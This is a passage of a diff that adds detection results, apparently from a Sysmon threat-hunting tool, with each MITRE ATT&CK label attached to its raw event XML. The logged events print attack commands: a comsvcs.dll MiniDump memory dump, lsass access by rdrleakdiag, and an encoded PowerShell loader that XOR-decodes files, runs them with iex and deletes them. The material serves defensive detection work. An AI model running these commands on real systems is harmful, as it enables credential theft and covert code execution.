AOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1567169648.396724,2019-08-30T16:54:08.396724+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-08-30T12:54:08.354049Z"">
+    </TimeCreated>
+    <EventRecordID>32154</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3292"" ThreadID=""928"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-08-30 12:54:08.331</Data>
+    <Data Name=""ProcessGuid"">747F3D96-1C70-5D69-0000-0010C9661F00</Data>
+    <Data Name=""ProcessId"">2888</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-1B6A-5D69-0000-0020E5810E00</Data>
+    <Data Name=""LogonId"">0xe81e5</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-1C70-5D69-0000-0010D4551F00</Data>
+    <Data Name=""ParentProcessId"">1144</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1567169648.396724,2019-08-30T16:54:08.396724+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-08-30T12:54:08.354049Z"">
+    </TimeCreated>
+    <EventRecordID>32154</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3292"" ThreadID=""928"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-08-30 12:54:08.331</Data>
+    <Data Name=""ProcessGuid"">747F3D96-1C70-5D69-0000-0010C9661F00</Data>
+    <Data Name=""ProcessId"">2888</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-1B6A-5D69-0000-0020E5810E00</Data>
+    <Data Name=""LogonId"">0xe81e5</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-1C70-5D69-0000-0010D4551F00</Data>
+    <Data Name=""ParentProcessId"">1144</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1567169648.396724,2019-08-30T16:54:08.396724+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-08-30T12:54:08.354049Z"">
+    </TimeCreated>
+    <EventRecordID>32154</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3292"" ThreadID=""928"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-08-30 12:54:08.331</Data>
+    <Data Name=""ProcessGuid"">747F3D96-1C70-5D69-0000-0010C9661F00</Data>
+    <Data Name=""ProcessId"">2888</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-1B6A-5D69-0000-0020E5810E00</Data>
+    <Data Name=""LogonId"">0xe81e5</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-1C70-5D69-0000-0010D4551F00</Data>
+    <Data Name=""ParentProcessId"">1144</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Process,1567169648.396724,2019-08-30T16:54:08.396724+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-08-30T12:54:08.354049Z"">
+    </TimeCreated>
+    <EventRecordID>32154</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3292"" ThreadID=""928"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-08-30 12:54:08.331</Data>
+    <Data Name=""ProcessGuid"">747F3D96-1C70-5D69-0000-0010C9661F00</Data>
+    <Data Name=""ProcessId"">2888</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-1B6A-5D69-0000-0020E5810E00</Data>
+    <Data Name=""LogonId"">0xe81e5</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-1C70-5D69-0000-0010D4551F00</Data>
+    <Data Name=""ParentProcessId"">1144</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1567169648.396724,2019-08-30T16:54:08.396724+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-08-30T12:54:08.354049Z"">
+    </TimeCreated>
+    <EventRecordID>32154</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3292"" ThreadID=""928"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-08-30 12:54:08.331</Data>
+    <Data Name=""ProcessGuid"">747F3D96-1C70-5D69-0000-0010C9661F00</Data>
+    <Data Name=""ProcessId"">2888</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-1B6A-5D69-0000-0020E5810E00</Data>
+    <Data Name=""LogonId"">0xe81e5</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-1C70-5D69-0000-0010D4551F00</Data>
+    <Data Name=""ParentProcessId"">1144</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1003.001] Credential dump Thread Open to Lsass,1601297256.206545,2020-09-28T16:47:36.206545+04:00,,Threat,Critical,Process ( C:\Windows\System32\rdrleakdiag.exe) attempted to access lsass process ( C:\Windows\System32\lsass.exe),8,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>8</EventID>
+    <Version>2</Version>
+    <Level>4</Level>
+    <Task>8</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-28T12:47:36.206545Z"">
+    </TimeCreated>
+    <EventRecordID>5227</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2848"" ThreadID=""2328"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>DESKTOP-PIU87N6</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-09-28 12:47:36.204</Data>
+    <Data Name=""SourceProcessGuid"">BC47D85C-DB68-5F71-0000-0010B237AB01</Data>
+    <Data Name=""SourceProcessId"">3352</Data>
+    <Data Name=""SourceImage"">C:\Windows\System32\rdrleakdiag.exe</Data>
+    <Data Name=""TargetProcessGuid"">BC47D85C-FAA9-5F68-0000-0010D9590000</Data>
+    <Data Name=""TargetProcessId"">668</Data>
+    <Data Name=""TargetImage"">C:\Windows\System32\lsass.exe</Data>
+    <Data Name=""NewThreadId"">3468</Data>
+    <Data Name=""StartAddress"">0x00007FF8C72C5EC0</Data>
+    <Data Name=""StartModule"">C:\WINDOWS\SYSTEM32\ntdll.dll</Data>
+    <Data Name=""StartFunction""></Data>
+  </EventData>
+</Event>",DESKTOP-PIU87N6,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920557.190585,2019-05-27T05:29:17.190585+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list apppool &quot;ERROR ( message:Configuration error &quot; /text:processmodel.username ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-27T01:29:17.190585Z"">
+    </TimeCreated>
+    <EventRecordID>5883</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""324"" ThreadID=""2260"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-27 01:29:17.150</Data>
+    <Data Name=""ProcessGuid"">365ABB72-3D6D-5CEB-0000-00101760FF00</Data>
+    <Data Name=""ProcessId"">2104</Data>
+    <Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
+    <Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Application Server Command Line Admin Tool</Data>
+    <Data Name=""Product"">Internet Information Services</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list apppool &quot;ERROR ( message:Configuration error &quot; /text:processmodel.username</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
+    <Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
+    <Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
+    <Data Name=""LogonId"">0x82423</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
+    <Data Name=""ParentProcessId"">2584</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot;  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1082] System Information Discovery,1555606894.168542,2019-04-18T21:01:34.168542+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( &quot;C:\Windows\system32\whoami.exe&quot;  /user) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-18T17:00:09.977481Z"">
+    </TimeCreated>
+    <EventRecordID>24</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3192"" ThreadID=""3288"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName"">technique_id=T1033,technique_name=System Owner/User Discovery</Data>
+    <Data Name=""UtcTime"">2019-04-18 17:00:09.677</Data>
+    <Data Name=""ProcessGuid"">365ABB72-AD19-5CB8-0000-0010F4F40C00</Data>
+    <Data Name=""ProcessId"">3980</Data>
+    <Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">whoami - displays logged on user information</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\whoami.exe&quot;  /user</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-AB27-5CB8-0000-002021CA0000</Data>
+    <Data Name=""LogonId"">0xca21</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
